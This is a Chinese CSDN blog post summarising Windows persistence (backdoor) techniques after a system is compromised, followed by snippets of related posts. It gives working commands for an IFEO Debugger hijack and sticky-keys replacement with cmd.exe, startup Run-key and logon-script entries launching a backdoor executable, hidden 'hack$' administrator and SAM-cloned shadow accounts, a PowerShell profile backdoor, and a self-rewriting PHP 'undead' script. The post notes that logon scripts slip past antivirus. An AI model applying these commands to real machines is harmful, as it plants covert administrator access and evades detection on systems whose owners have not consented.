windows基本权限维持手法

已于 2022-10-20 23:47:31 修改
阅读量125 收藏
点赞数
分类专栏: 权限 文章标签: windows 网络安全
于 2022-10-19 23:26:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53396158/article/details/127385119
版权

windows维权

php不死马

<?php
    ignore_user_abort();//关掉浏览器php脚本也执行
	set_time_limit(0);//无限制执行
	$interval = 5;//每隔5秒运行
do{
    $filename = 'test.php';
    if(file_exists(filename)){
        echo "xxx";
    }
    else {
        $file = fopen("test.php", "w");
        $txt = "<?php phpinfo();?>\n";
    fwrite($file, $txt);
    fclose($file);
    }
    sleep($interval);
} while(true);
?>

映像劫持

#win+R
regdeit
#注册表进入此目录
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
#新建项sethc.exe
#新建字符串值Debugger填入
C:\Windows\System32\cmd.exe
#桌面新建backdoor.exe打开即为cmd

#cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

策略组脚本

#win+R
gpedit.msc
#打开计算机配置,windows设置,脚本(启动/关机)
#启动中添加.bat文件
@echo off
net user hack$ 123456 /add && net localgroup administrators hack$ /add
#每次重启会运行

shift后门

如果按五次shift会弹出粘滞键

#cmd
#进入粘滞键sethc目录
cd c:\windows\system32\sethc.exe
#原版sethc做备份
move sethc.exe sethc.exe.bak
#cmd伪造为sethc
copy cmd.exe sethc.exe

LogonScript

用户登录时触发登录脚本,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截

#进入\HKEY_CURRENT_USER\Environment新建字符串值UserInitMprLogonScript修改数据为后门
#cmd
REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\shell.exe"(自己创建的后门exe)

影子账户

user 加上后缀 加上后缀 加上后缀cmd命令无法查到

#cmd
net user hack$ QWEasd123 /add
net localgroup administrators test$ /add
#创建cmd隐藏账号

#win+R
regedit
进入HKEY_LOCAL_MACHINE\SAM\SAM设置权限administrator完全控制
进入HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
将隐藏账号hack$导出
进入HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
将01F4和hack$默认值导出
01F4中的F值替换hack$默认值
双击导入创建成功

启动后门

#注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
新建字符串值test1
填写数据c:\shell.exe

#cmd
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test1 /t REG_SZ /d "C:\shell.exe"

powershell配置文件后门

#查看是否存在配置文件
echo $profile
#返回false
test-path $profile
#强制创建
New-Item –Path $Profile –Type File –Force   
#创建bat文件
net user longwa 123456 /add & net localgroup administrators longwa /add
#创建变量spring
$string = 'Start-Process "C:\1.bat"'
#把变量$string内容写入到配置文件
$string | Out-File -FilePath $profile -Append   
#powershell再次被打开就会执行
2024年最新Windows权限维持技术总结、复现_cs权限维持网络安全开发技术总结
2401_84264692的博客
05-06 906
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
windows权限维持方法详解
内心不种满鲜花就会长满杂草
01-23 3771
在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问。 权限持久化(权限维持)技术就是包括任何可以被测试人员用来在系统重启、更改用凭据或其他可能造成访问中断的情况发生时保持对系统的访问技术。
Windows 权限维持手法
qq_53742230的博客
07-20 932
Windows 权限维持手法总结
Windows权限维持
2301_76786857的博客
02-07 940
作为一个攻击者,利用漏洞拿下某个服务器或者是终端的控制权限之后,需要考虑的是如何将拿下的主机当作一个据点,保证持续拥有该主机的控制权限,进而方便后续的攻击行为,如内网渗透、挖矿、勒索、持续监控等等。 当安全工程师了解或者是掌握权限维持技术后,也能更快的做出应急响应预案,进行应急处置工作,从而降低企业损失。
WINDOWS权限维持
qq_58000413的博客
06-07 613
这里可以将计算器路径换为自己的shell后门,这里还需要更换图标,这里稍微有一点缺陷就是会弹出一个黑框框。上传nc,写入注册表开机自启,将cmd给出去留个后门,更改防火墙规则,允许后门端口开放。将administrator的"F"值复制给hack的"F",下面是我已经替换好的。这个方法是执行vbs脚本,这里很容易被杀软拦截,在实验操作的时候需要将杀毒软件关掉。我们导出name中的hack$的注册表,然后导出上面对应的文件夹的注册表。在每次开机或重启的时候都会运行启动文件夹下的程序。然后导入刚才的注册表,
windows权限维持汇总
LINGX5的博客
08-27 894
msdtc.exe是微软分布式传输协调程序。该进程调用系统Microsoft Personal Web Server和Microsoft SQLServer。该服务用于管理多个服务器。msdtc.exe是一个并列事务,是分布于两个以上的数据库,消息队列,文件系统或其他事务保护资源管理器,删除要小心。对应服务MSDTC,全称Distributed Transaction Coordinator,Windows系统默认启动该服务对应进程msdtc.exe,位于%windir%system32。
windows权限维持
qq_44704184的博客
07-07 543
权限维持
Windows找出权限维持的后门
A526847的博客
05-29 1098
Windows权限维持主要包含活动隐藏、自启动等技术。
Windows权限维持方法
weixin_43722879的博客
08-15 631
Windows权限维持方法
windows权限维持的方法
小小猪的博客
01-04 6107
windows权限维持的方法 影子账户: 使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏 打开注册表(HKEY_LOCAL_MACHINE\SAM\SAM),修改SAM权限,赋予adminitrators完全控制权限 重启之后,将Administr.
内网渗透之windows权限维持
07-18
【标题】"内网渗透之windows权限维持"揭示了网络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
Telemetry:WINDOWS TELEMETRY权限维持
03-18
今天,我们将讨论一种持久性方法,该方法利用了Microsoft过去十年在Windows版本中包含的一些出色的遥测技术。 本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / ...
Windows权限维持技术总结、复现_cs权限维持(1)
2401_84297035的博客
04-26 1034
利用 windows 开机启动项实现权限维持,每次系统启动都可实现后门的执行,很不错的权限维持的方式影子账户,顾名思义就像影子一样,跟主体是一模一样的,通过建立影子账户,可以获得跟管理员一样的权限,它无法通过普通命令进行查询,只能在注册表中找到其详细信息。映像劫持,也叫重定向劫持。即想运行 A.exe,结果运行的是B.exe。在 Windows NT 架构的系统中,IFEO 的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。
面向对象编程 vs 函数式编程
weixin_48191864的博客
11-10 499
面向对象编程(OOP)和函数式编程(FP)的核心概念与差异。通过实现Todo List的实例,对比两种编程范式的特点、优势和适用场景,帮助开发者选择最适合的编程方式,提升代码质量。
二叉树遍历/算法&数据结构
2403_86942375的博客
11-10 682
其实很简单,根据遍历的顺序摆放遍历顺序和添加元素的顺序,(root.left, result)代表左子树,(root.right, result)代表右子树,(root.val)代表中节点。其实很简单,参数就是要目前遍历节点在哪,返回值也同理,终止条件就是指遍历到null的时候回溯,逻辑不要想复杂,根据顺序移动上述上个递归函数即可。前序(要理解遍历的核心,先把中节点塞入,然后根据栈去模拟,先加入右节点然后是左节点,移动到左节点继续加入)后序(就是前序遍历的左右调换顺序,然后再倒叙结果数组)
SAP-ABAP开发-ONLINE 程序、DIALOG屏幕开发
qq_55841727的博客
11-07 1253
Report程序:1类型程序 制作报表,数据列表(Data List)输出Online程序:M类型程序 查询数据,录入、修改、删除等Module Pool 程序:以Module Pool形态进行业务流程的逻辑处理Online 程序,强调用Online Transaction来处理业务流程进行过程Screen 程序,主要使用Screen(及屏幕对象),并实现界面间Flow Logic(流逻辑)
C# 用于将一个DataTable转换为Users对象的列表
weixin_53720617的博客
11-10 212
// 用户名循环赋值。
【我的 Anti-AV 学习手札】DLL注入
最新发布
Mr_Fmnwon的博客
11-10 728
无敌舍友s神免杀学了一个阶段,达者为师,向s师傅学习!!ps:我的基础实在薄弱,WIN编程甚至都没做过,所以笔记翔实些。
kill-start系统进程的研究
NPSM_的博客
11-05 910
网络安全红队大佬(成长ing),学习分享
Windows权限维持技术解析
"“一千零一种”权限维持方法.pdf - 关注Windows权限维持,包括理解、常用方法和安全相关的知识点" 本文档主要讲述了在网络安全领域如何维持对目标系统的长期控制,特别是针对Windows操作系统的权限维持技术。权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值